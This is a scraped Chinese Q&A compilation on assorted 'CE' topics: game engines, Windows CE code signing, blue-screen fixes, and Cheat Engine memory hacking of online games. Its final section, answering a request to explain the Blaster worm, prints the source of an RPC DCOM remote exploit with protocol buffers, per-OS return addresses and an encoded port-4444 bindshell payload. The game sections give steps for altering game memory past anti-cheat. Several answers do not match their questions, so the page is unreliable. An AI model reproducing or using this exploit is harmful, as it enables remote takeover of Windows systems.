ce3源码

㈠ Unity3d，UDK 和 CE3 三者之间各有什么优缺点如何选择

不太了解CE3，
至于unity3d和UDK（其实现在应该是虚幻4了吧）
unity3d和虚幻4以及CE3现在都是免费的，但是虚幻4开放了源代码下载。

unity3d的优点是上手容易，而且unity3d本身有asset store的商城，很多东西可以在商城上下载，这使得开发便利了许多。同时，跨平台也是unity3d的一大优点，目前在手机平台上占有很大的份额。如果是个人开发的话，个人感觉Unity3d是最好的选择了。顺便一提，unity3d似乎没有特别严苛的授权费用问题，似乎作品年收入10w美元以下是不需要向unity3d交钱的。
缺点在于unity3d并没有像虚幻4和ce3那样的高画质，当然，由于Unity3d本身可以进行图形编程，所以理论上也可以达到虚幻4和ce3的高度，但是毕竟不太容易，所以想要打造次时代大作还是放弃unity3d吧。

虚幻4的优点主要在于画质和性能，很轻松地便可以得到非常好的画面。为了竞争市场，虚幻4如今也是免费的，开发者只需要将制作所得的5%分给Epic，而且虚幻4另一大优势在于它的源代码是开放的，这意味着开发者可以根据自己的需要修改引擎，但是如果不是大型项目需要，这个优势并不明显。虚幻4引擎同样有一个商城，但是跟unity3d比起来，内容实在是少的可怜了些。
虚幻4的缺点在于吃配置，不是所有的电脑都能很轻松的运行起来。而且虽然虚幻4也跨平台，但是手机平台上虚幻4的份额比较少，如果想要制作次时代的PC游戏，个人认为虚幻4是很好的选择。

㈡ 高分求ce5.3的源码，只要5.3，邮箱：[email protected]

5.3没有了，有5。6的要吗

㈢ 如何加密 Windows CE系统

椋‥XE、DLL、OCX）都能够正常运行，存放在永久存储器上的模块在开发者数字签名后也能够运行，而没有数字签名的模块则不能运行。读者有兴趣可以查看CE帮助文档中标题为《Create a Trusted Environment》的文章。言简意赅，下面就开始讲解如何实现可信任环境。
1、得到钥容器
得到钥容器（key container）的方法是调用Win32 Security API。先得到CSP（cryptographic service provider），再得到key container。默认的CSP为Microsoft Base Cryptographic Provider。默认的key container以当前登录用户名为名称。如果你熟悉加密方面知识的话可以另外调用其他CSP。在此我们以Microsoft Base Cryptographic Provider默认的key container为signfile需要的钥容器。
2、对模块签名
signfile.exe 用于对模块签名。这个文件在CE安装目录里（包括源码）可以找到，下面是参数说明：
-o 输出签名数据到指定的文件
-k 指定CAPI 钥容器
-p 输出公钥到指定文件（内容为一个C语言数组）
-s 嵌入指定字符
-a 在指定的PE格式的文件中附加签名数据
-f 要签名的文件（EXE、DLL）
假如我们要将myproc.exe签名，假设我们以fulinlin名字在桌面Windows上登录，那么在命令行输入如下命令：
signfile -fmyproc.exe -a -kfulinlin -pmyproc.txt
上面参数告诉signfile.exe 用钥容器fulinlin中的私钥将文件myproc.exe签名，并且将公钥存放到名为myproc.txt的文件中。加密具体过程很复杂，我对加密不了解，只能理解到这么低级的程度。如果说错了希望读者指教。
3、编写检验函数
编写检验函数前请参考CE的帮助文档中标题为《Verifying a Signature》的文章。我们只需要把这篇文章中最下面的代码复制到CE安装目录下定义OEMInit函数的.c文件中。因为我的调试平台属于X86系列，所以定义OEMInit函数是在cfwpc.c文件中。为了使读者能够简单弄懂这个机制，我把相关函数、变量做一个简单说明，如下：
////初始化公钥函数[NextPage]extern BOOL InitPubKey(const BYTE *KeyBlob, DWORD cbKeyBlob);
/////这两个指针是在loader.c文件中定义的，loader.c实现加载器的功能，加载模块（EXE、DLL）。这两个指针指向两个函数，pOEMLoadInit
////指向的函数的功能是：每当加载一个模块的时候这个函数决定是否需要验证。TRUE表示需要，FALSE不需要。pOEMLoadMole指向的
////函数的功能是：验证将要加载的模块是否具有合法的签名。有三个返回值，具体请看帮助文档。
extern OEMLoadInit_t pOEMLoadInit; extern OEMLoadMole_t pOEMLoadMole;
/////以"CertifyMole"开头的函数为系统自带的验证函数。有了这三个函数你就不用去了解加密知识了。
extern BOOL CertifyMoleInit(void); extern BOOL CertifyMole(PBYTE pbBlock, DWORD cbBlock);extern BOOL CertifyMoleFinal(PBYTE *ppbSignData, PDWORD pcbSignData);
注意公钥数据g_bSignPublicKeyBlob，要把signfile导出的公钥覆盖代码中原有的g_bSignPublicKeyBlob 。
[NextPage]4、编译并测试用PB打开一个内核工程，进入命令行状态（菜单open build release directory）。键入"build -c"和"sysgen i486oal"，因为cfwpc.c是i486oal.lib的一部分。之后重新编译内核。
测试方法是把任何一个CE下运行的EXE复制一份，一份不改变，另一份由signfile签名。然后把这两个文件复制到永久存储器上运行。测试结果签名的能运行，而不签名的不能运行（弹出对话框显示"找不到XXX（或它的某一个组件）。

㈣ 谁能告诉我更改ce的标题的源代码是哪个啊,

（一）蓝屏由电脑操作引起：
1、回忆一下，蓝屏前，进行了什么操作？按F8进入安全模式，删除、卸载、取消你之前的操作。
2、按F8进入安全模式，选择“最后一次正确配置”或者“正常启动”。
（二）蓝屏由硬件引起：
1、更换或者添加硬件，出现硬件不兼容现象。卸下新加硬件。新加硬件兼容，也可能蓝屏，因为系统不能识别新添加的硬件，建议重装系统。
2、电脑使用过久，内存、显卡的金手指被氧化而引起接触不良。把内存、显卡，取下来用橡皮擦擦卡的金手指，再向卡槽内加入少量无水酒精
（清洗槽内氧化物），几分钟后，用电吹风吹干，再插好。
3、硬盘不稳定引起，此故障均为硬盘损坏，修复硬盘坏道或直接更换硬盘。
4、键鼠故障，重新插拔一下USB。

5、机箱内灰尘多引起，清除灰尘（一般3-5个月清除一次）。并卸下CPU风扇，轻轻擦去U上的硅脂，再重新涂上一薄层新硅脂。
6、超频也可能引起电脑蓝屏。如果超频了，就取消超频。
7、恢复BIOS设置。
（三）蓝屏由软件引起：
1、360修复引起。卸载360或重装系统。
2、修复漏洞或杀毒引起。此故障均为操作不当，卸载补丁。
3、驱动精灵、驱动人生等软件引起，但此类故障较少。因系统和显卡驱动的兼容性不好（别追求新驱动，新的驱动有的并不适合你的显卡），也会出现这样的错误，建议更换适合的显卡驱动安装。
4、电脑中毒，使用专业杀毒软件进行全盘杀毒，并把隔离区的文件删除，重启电脑，再进行一次查杀，防止二次病毒感染。
5、安装了不稳定的软件，建议全盘杀毒，卸载引发问题的软件，重新安装其他版本的软件。

其实，电脑蓝屏了，最好的解决方法是：重装系统。如发现安装的系统经常出现蓝屏现象，则应该换个系统安装。
如果是中毒后系统重装，建议重装系统后，先安装杀毒软件，进行一次彻底的全盘查杀后，再安装其它软件。
很高兴为您解答：
你看下你电脑的蓝屏代码是什么，才能更好的分析
1。电脑中存有病毒（打开电脑管家一杀毒一扫描查杀）如果杀到木马或病毒后，应立即重启， 重启电脑后，来到“隔离|恢复”，彻底删除，木马和病毒！
2。电脑系统有顽固的病毒和木马或蠕虫干扰，或者丢失了系统文件（电脑管家的木马查杀，打开电脑管家一杀毒一扫描查杀）

㈤ 怎么写像ce一样修改进程速度的源码求大神

工具：CE或ME或GE等内存修改工具步骤：1.进传奇，切回桌面 比如我用的是CE那么打开CE 在左上角有个电脑图标打开它（鼠标放在上面会提示打开进程）选择Game2进程
2.切回游戏 按F12 选战斗 你会看见有游戏加速 攻击加速 魔法加速 的条条 这里把魔法加速的数值随意调节 比如我调3 然后切回桌面 在数值的下方输入3 按回车或首次收索
3.你回发现地址栏突然多了许多地址（我们的加速地址就在其中) ,然后进游戏 把魔法加速调到另一个数值（这个要注意）比如我调到2 切回桌面在数值栏里输入2 回车或按再次搜索
4.你回发现地址栏里的地址变少了这样我们要查找的加速地址的范围就减少了 在回到游戏调节一个不同的数值（就是不和你刚才输入的相同即可.即我可以调为3或4或5或1但是最好别调为2） 然后切出来 输入你刚才调节的数值 好了现在地址栏一般已经只剩下2到3个了在怎么弄都是那几个地址(若地址还很多在重复步骤调节-切出--输入-回车-进游戏-调节...直到还剩那几个地址)

㈥ 地下城与勇士的CE（改图软件）的源码，我需要找到源码自己做一个。谁有源码

改1.25经验：[attachment=63281][attachment=63282]
第1行的才是改图的图片
首先，大家要知道一个事情，MMD运行需要管理员权限，大家可以打开始，注销那里看下自己的用户名，然后在打开始，运行，打CMD，在控制台（也就是DOS里）打命令net user 你刚才看到的用户名，如果不是ADMINISTRATORS组的，那不好意思，MMD你用不了。
2 MMD打开DNF也需要技巧，就是打开进程的时候必须选择把以受限模式打开的勾选上，这个很重要，因为有TESSAFE，不这样的话你可能会得到一个E文，说是无法打开。
3 今天偶开始的时候也老是改不出来，偶也觉得很奇怪，自己观察了下内存，都是假数字。很多朋友说找到唯一地址了，也改不出图或者修理什么的，真正原因是TX又做了不知虾米东西烟雾弹，改假地址当然进不去。怎么判断是否是改的假地址？比如说修理吧，卖是5，修是6是吧？ 如果你锁定了某个地址，然后走远了，发现这个地址不为0，还是5或者6，那肯定是假地址了。
解决方案也是有的，好多朋友粗心没写出来。偶看了下，必须把DNF和MMD都丢到360里，才能找出正确的数值
4 改图出现XX的问题，这个问题我来告诉大家为什么，出现XX就说明没这个图或者没这个类型。
有个朋友发的改王图说改255，那是错误的，正确的应该是改3，0是普通，1是冒险，2是勇士，3是王，改深渊前提你要先把深渊开下来，也就是说你先拿门票，然后把深渊点开，才能修改其他地方深渊。
5 改其他地图问题，改其他地图就是拿改王的地址，右键选16进制编辑器，然后自己看，在改地图类型的前四个就是了
地图表大家可以自己找。在发MMD的改王教程的那位兄弟的帖子里有，我就不转了。
6 修改数值问题，好多人问我直接改了为什么没效果？呵呵，那是因为没刷新。正确修改数值方法应该是，选中你要修改的数值
然后按右键，选择修改，然后上面写地图代码，下面是选择类型。默认的是10进制，这也是为什么好多兄弟教程里教大家把地图的代码表转成10进制的原因。不会转也没关系，修改里面下面的选择类型里有HEX，就是16进制，把16进制的代码表放进去，下面选择HEX就OK了
7 修理/卖东西是没问题。但是改地图记得，进入不同区域的副本，其内存值是改变的，也就是说比如你在天空改的图，有了内存地址了，你跑暗黑在改，地址就不对了，需要大家继续搜索
8 关于加速的问题，MMD的加速在DNF里是无法使用的，但别忘记除了DNF，我们17网里还有好多其他的游戏，大家可以去其他的游戏里试试下，TX的游戏就算咯，还是那句话，TESSAFE不破，很牛X的东西就别想用工具改出来。
======================================================================
具体说下改深渊，一样道理哈
比如你有天空的门票了，先去天空，随便点个地图，搜索好自己要搜索的地址，然后出来下，在进（怕时间不够）
先选择普通图，把深渊点出来，然后把图改成自己要去的图和级别，OK，进吧，深渊出来了
PS： 一段时间米DNF了，也没门票试验了，这是老方法，大家可以自己尝试，不过要记得，1：把深渊图选出来 2身上要有门票
=======================================================
图改出来进不去副本，请检查一下自己的级别是否够，材料是否够？改图不能帮你节省材料的，最多是改深渊图可以用低级门票进高级深渊而已
======================================================================
第二，有人问改1.25经验的
偶尝试了下，其实很简单，大家都知道改图难度的代码吧，0普通什么的，那里改成255（10进制）或者FF（16进制）就可以了，但是偶改了下，MS都是红XX，直接进就可以了，不过如果求高经验，可以先改成王图，在改1.25倍经验
第三，有人问找到的地址是00EF200C，确实，偶有时候也会改出这个来，这个就是TX的烟雾了，这个就是所谓的假地址。
请大家把MMD和DNF都从360启动，然后在修改，如果还是出这个地址就换地方，一般偶改图喜欢在最左边那的
也就是下面图的那个地方改，MS没失败过，如果碰到假地址，可以到偶改图的位置试验下
======================================================================
改1.25经验：[attachment=63281][attachment=63282]
我是这样做的，老样子，搜出唯一地址后，再到MMD右侧界面那里，双击地址，将“修改的数值”一项改为3，然后将“锁定时的数值”中的Exact Value 值修改为3，最后再将“修改的数值”改为255，进入即可。
注意的是，显示和经验都是王者图的，但是路上没有小BOSS之类的，而且BOSS不掉东西，我想因为是按照普通级别修改的缘故吧，所以想打装备的话，还是不要修改了，要经验的话，还是不错的。
另MMD的开王者修理等方法大家去网上查就OK了，介绍很详细

㈦ 如何查看exe文件的源代码

需要准备的工具：电脑，反编译工具ILSpy。

1、首先在网络上搜索下载反编译工具ILSpy，解压后如图，双击.exe文件打开解压工具。

㈧ 这种代码怎么才能得到

把你网页的开头这一段
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
改为<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

㈨ 易语言修改造梦西游3攻击力源码

..com/question/577550491.html?fr=uc_push&push=keyword&entry=uhome_new&oldq=1

㈩ 谁帮我分析（注释）下冲击波源代码。。注明个段代码的功能。它是用什么语言写的我有C、C#编程基础）

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

＃i nclude

unsigned char bindstr[]={

0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,

0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request1[]={

0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03

,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00

,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45

,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E

,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D

,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41

,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00

,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45

,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00

,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00

,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29

,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00

,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF

,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10

,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09

,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00

,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00

,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00

,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00

,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03

,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00

,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E

,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00

,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00

,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00

,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00

,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00

,0x00,0x00,0x00,0x00,0x00,0x00};

unsigned char request2[]={

0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00

,0x00,0x00,0x5C,0x00,0x5C,0x00};

unsigned char request3[]={

0x5C,0x00

,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00

,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00

,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};

unsigned char *targets [] =

{

"Windows NT SP4 (english)",

"Windows NT SP5 (chineese)",

"Windows NT SP6 (chineese)",

"Windows NT SP6a (chineese)",

"Windows 2000 NOSP (polish)",

"Windows 2000 SP3 (polish)",

"Windows 2000 SP4 (spanish)",

"Windows 2000 NOSP1 (english)",

"Windows 2000 NOSP2 (english)",

"Windows 2000 SP2-1 (english)",

"Windows 2000 SP2-2 (english)",

"Windows 2000 SP3-2 (english)",

"Windows 2000 NOSP (chineese)",

"Windows 2000 SP1 (chineese)",

"Windows 2000 SP2 (chineese)",

"Windows 2000 SP3 (chineese)",

"Windows 2000 SP4 (chineese)",

"Windows 2000 SP3 (german)",

"Windows 2000 NOSP (japaneese",

"Windows 2000 SP1 (japaneese)",

"Windows 2000 SP2 (japaneese)",

"Windows 2000 NOSP (korean)",

"Windows 2000 SP1 (korean)",

"Windows 2000 SP2 (korean)",

"Windows 2000 NOSP (mexican)",

"Windows 2000 SP1 (mexican)",

"Windows XP NOSP (english)",

"Windows SP1-2 (english)",

"Windows 2k3 (english)",

"Windows 2000 SP3 (german)",

"Windows 2000 SP4-1 (german)",

"Windows 2000 SP4-2 (german)",

"Windows XP SP1 (german)",

"Windows 2000 SERVER SP1 (french)",

"Windows 2000 SERVER SP4 (french)",

"Windows XP NOSP (french)",

"Windows XP SP1 (french)",

"Windows 2000 SP0 (english)",

"Windows 2000 SP1 (english)",

"Windows 2000 SP2 (english)",

"Windows 2000 SP3 (english)",

"Windows 2000 SP4 (english)",

"Windows XP SP0 (english)",

"Windows XP SP1-1 (english)",

"Windows XP SP2 (english)",

"Windows 2000 Advanced Server SP3 (english)",

"ALL/WINXP/WIN2K",

NULL

};

unsigned long offsets [] =

{

0x77e527f3,

0x77cfdaee,

0x77ac0ef0,

0x77c3eaf0,

0x774d3fe3,

0x77292ce4,

0x77133ba5,

0x777416e8,

0x772b49e2,

0x77b524e8,

0x775cfa2e,

0x772ae3e2,

0x778b89e6,

0x772b49e0,

0x77444342,

0x77294cdf,

0x777a882e,

0x77e527f3,

0x778b89e5,

0x772b49df,

0x772ae3e1,

0x778b89e5,

0x772b49df,

0x772ae3e1,

0x778b89e8,

0x77e3afe9,

0x77db37d7,

0x77b05422,

0x77292ce3,

0x77294ce0,

0x7756c2e2,

0x77fc18d4,

0x774b3ee4,

0x7756c2e2,

0x774a75d4,

0x77fc18d4,

0x77e81674,

0x77e829ec,

0x77e824b5,

0x77e8367a,

0x77f92a9b,

0x77e9afe3,

0x77e626ba,

0x77d737db,

0x77e2afc5,

0x010016C6

};

unsigned char sc[]=

"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"

"\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"

"\x46\x00\x58\x00\x46\x00\x58\x00"

"\xff\xff\xff\xff" /* return address */

"\xcc\xe0\xfd\x7f" /* primary thread data block */

"\xcc\xe0\xfd\x7f" /* primary thread data block */

/* port 4444 bindshell */

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"

"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"

"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"

"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"

"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"

"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"

"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"

"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\x4c\x4c\x62\xcc\xda\x8a\x81"

"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"

"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"

"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"

"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"

"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"